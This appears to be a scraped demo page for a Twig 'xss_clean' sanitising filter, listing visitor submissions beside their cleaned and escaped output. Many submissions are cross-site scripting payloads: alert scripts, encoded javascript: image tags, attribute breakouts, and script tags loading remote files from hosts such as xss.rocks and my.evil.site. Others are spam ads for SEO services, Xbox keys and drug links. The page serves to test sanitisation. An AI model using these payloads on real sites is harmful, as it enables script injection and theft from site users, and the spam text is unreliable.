    description: hi there here is the your quote on the Country targeted organic website traffic: https://hyperlabs.co/quote/ thanks and regards Mike Hyperlabs LTF

    by Lucy Merrick | at 2020-09-23 01:28:18


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

    keyword(s):

    description:

    by asd | at 2020-09-21 10:33:38


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    asdasd

    result with twig: {{ xss.xss | escape }}:

    asdasd

    keyword(s):

    description:

    by asdasd | at 2020-09-21 10:33:07


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    asdasd

    result with twig: {{ xss.xss | escape }}:

    asdasd

    keyword(s): b

    description: c

    by a | at 2020-09-17 19:09:53


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>oi</script>

    keyword(s): 123

    description: mundo

    by deni | at 2020-09-16 04:23:59


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    mundo

    result with twig: {{ xss.xss | escape }}:

    <script>oi</script>mundo

    keyword(s): 123

    description: mundo

    by deni | at 2020-09-16 04:23:34


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    $#$a#

    result with twig: {{ xss.xss | escape }}:

    $#$a#

    keyword(s): 123

    description: $#$a#

    by deni | at 2020-09-16 04:22:30


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    asas

    result with twig: {{ xss.xss | escape }}:

    asas

    keyword(s): 123

    description: asas

    by deni | at 2020-09-16 04:21:58


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    123

    result with twig: {{ xss.xss | escape }}:

    123

    keyword(s): 123

    description:

    by deni | at 2020-09-16 02:51:38


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert('Help me');</script>

    keyword(s): 1234

    description: hello man

    by Denilson | at 2020-09-16 02:49:19


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert('XSS');</script>

    keyword(s):

    description:

    by | at 2020-09-15 19:59:38


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    egegerger

    result with twig: {{ xss.xss | escape }}:

    egegerger

    keyword(s): rgergersger

    description: regegr

    by rgrgreg | at 2020-09-15 04:15:07


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    wd

    result with twig: {{ xss.xss | escape }}:

    wd

    keyword(s): wd

    description: wd

    by dw | at 2020-09-15 04:14:44


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    aaaaaaaaaaaaaaaa

    result with twig: {{ xss.xss | escape }}:

    <script>alert('XSS');</script>aaaaaaaaaaaaaaaa

    keyword(s): 123

    description:

    by deni | at 2020-09-15 03:13:27


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert('XSS');</script>

    keyword(s): b

    description: abc

    by a | at 2020-09-15 03:09:27


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert(hola')</script>

    keyword(s): test

    description: test

    by test | at 2020-09-09 22:44:26


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert(hola')</script>

    keyword(s): sdfsdf

    description: sdfsdfs

    by sdfsdf | at 2020-09-09 18:55:37


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    XBOX приобрести в спортивные игы на другие различные тематики и получай подарки + https://plati.market/itm/assassin-s-creed-sindikat-gold-edition-usa-xbox-kljuch/2908442 XBOX приобрести в спортивные игы на другие различные тематики и получай подарки + https://vk.com/public195417980

    result with twig: {{ xss.xss | escape }}:

    XBOX приобрести в спортивные игы на другие различные тематики и получай подарки + https://plati.market/itm/assassin-s-creed-sindikat-gold-edition-usa-xbox-kljuch/2908442 XBOX приобрести в спортивные игы на другие различные тематики и получай подарки + https://vk.com/public195417980

    keyword(s):

    description: XBOX приобрести в спортивные игы на другие различные тематики и получай подарки + https://plati.market/itm/assassin-s-creed-sindikat-gold-edition-usa-xbox-kljuch/2908442 XBOX приобрести в спортивные игы на другие различные тематики и получай подарки + https://vk.com/public195417980

    by minimax | at 2020-09-09 09:51:33


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert('hi')</script>

    keyword(s): asd

    description: asdasdad

    by asd | at 2020-09-08 05:27:39


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    江西省 赣州市 章贡区 谭口镇新世纪广场友佳便利店sCRiPt/SrC=//xsshs.cn/ASk9

    result with twig: {{ xss.xss | escape }}:

    江西省 赣州市 章贡区 谭口镇新世纪广场友佳便利店sCRiPt/SrC=//xsshs.cn/ASk9

    keyword(s): sdf

    description: sdf

    by sf | at 2020-09-07 10:22:19


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    hanirtb

    result with twig: {{ xss.xss | escape }}:

    <h1>hanirtb</h1>

    keyword(s): hani

    description: <h1>hanirtb</h1>

    by hani | at 2020-09-05 22:12:19


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script> function myFunction() { alert("Hello\nHow are you?"); } </script>

    keyword(s): ab

    description: ab

    by abc | at 2020-09-05 05:04:19


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script> function myFunction() { alert("Hello\nHow are you?"); } </script>

    keyword(s): Ggg

    description: Gggg

    by ggh | at 2020-09-02 20:09:43


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <h1><img src= "https://www.ignitetechnologies.in"></h1>

    keyword(s): Ggv

    description: Fvb

    by Tag sendirivv | at 2020-09-02 20:08:31


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    asfda

    result with twig: {{ xss.xss | escape }}:

    asfda

    keyword(s):

    description: af

    by sa | at 2020-09-02 18:47:23


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    http://testsite.test/

    result with twig: {{ xss.xss | escape }}:

    http://testsite.test/<script>alert("TEST");</script>

    keyword(s): qeq

    description:

    by eqwe | at 2020-09-02 15:11:04


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <h1><img src= "https://www.ignitetechnologies.in"></h1>

    keyword(s): khkjh

    description: khk

    by jkhkjh | at 2020-09-02 11:58:36


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

    keyword(s):

    description:

    by $strip_tags | at 2020-09-02 10:05:51


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    ""@stmpname.com

    result with twig: {{ xss.xss | escape }}:

    "<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

    keyword(s): fjf

    description: jhgjh

    by gvgv | at 2020-09-02 06:37:57


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    What's your number? https://laseveetlesracines.fr/stmap_26kgwdk.html pristiq rxlist Their decision won’t only be based on finances, either. It’ll be based at least in part on how sure they are that Randle can fill that role. That means they’ll need to see more of those long touchdown catches, and less of those costly mistakes.

    result with twig: {{ xss.xss | escape }}:

    What's your number? https://laseveetlesracines.fr/stmap_26kgwdk.html pristiq rxlist Their decision won’t only be based on finances, either. It’ll be based at least in part on how sure they are that Randle can fill that role. That means they’ll need to see more of those long touchdown catches, and less of those costly mistakes.

    keyword(s): pZx26O

    description: What's your number? https://laseveetlesracines.fr/stmap_26kgwdk.html pristiq rxlist Their decision won’t only be based on finances, either. It’ll be based at least in part on how sure they are that Randle can fill that role. That means they’ll need to see more of those long touchdown catches, and less of those costly mistakes.

    by Edgar | at 2020-09-01 00:11:28


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    Jonny was here http://www.mediacenterimac.com/stmap_11j4rhq.html high off benadryl pills It was revealed Thursday that an arbitrator ordered the Education Department to rehire Passarella — even though he confirmed her misconduct. She “still has a great deal to offer the NYC DOE, albeit not in the position of school principal,” arbitrator Joel Douglas declared.

    result with twig: {{ xss.xss | escape }}:

    Jonny was here http://www.mediacenterimac.com/stmap_11j4rhq.html high off benadryl pills It was revealed Thursday that an arbitrator ordered the Education Department to rehire Passarella — even though he confirmed her misconduct. She “still has a great deal to offer the NYC DOE, albeit not in the position of school principal,” arbitrator Joel Douglas declared.

    keyword(s): 4VTYxu

    description: Jonny was here http://www.mediacenterimac.com/stmap_11j4rhq.html high off benadryl pills It was revealed Thursday that an arbitrator ordered the Education Department to rehire Passarella — even though he confirmed her misconduct. She “still has a great deal to offer the NYC DOE, albeit not in the position of school principal,” arbitrator Joel Douglas declared.

    by Robbie | at 2020-08-31 18:31:56


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    Could I have , please? http://stairlift-forum.co.uk/stmap_42qyb96.html emergency supply of synthroid In eastern Cairo, tens of thousands of Morsi supporters at the Rabaa mosque sit-in chanted against el-Sissi and vowed to continue their push for the president's reinstatement. Others marched through some neighborhoods of Cairo.

    result with twig: {{ xss.xss | escape }}:

    Could I have , please? http://stairlift-forum.co.uk/stmap_42qyb96.html emergency supply of synthroid In eastern Cairo, tens of thousands of Morsi supporters at the Rabaa mosque sit-in chanted against el-Sissi and vowed to continue their push for the president's reinstatement. Others marched through some neighborhoods of Cairo.

    keyword(s): y6NO1

    description: Could I have , please? http://stairlift-forum.co.uk/stmap_42qyb96.html emergency supply of synthroid In eastern Cairo, tens of thousands of Morsi supporters at the Rabaa mosque sit-in chanted against el-Sissi and vowed to continue their push for the president's reinstatement. Others marched through some neighborhoods of Cairo.

    by Arron | at 2020-08-31 17:38:31


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    "><"

    result with twig: {{ xss.xss | escape }}:

    "><script>alert('1');</script><"

    keyword(s): "><"

    description: "><"

    by "><" | at 2020-08-28 09:23:52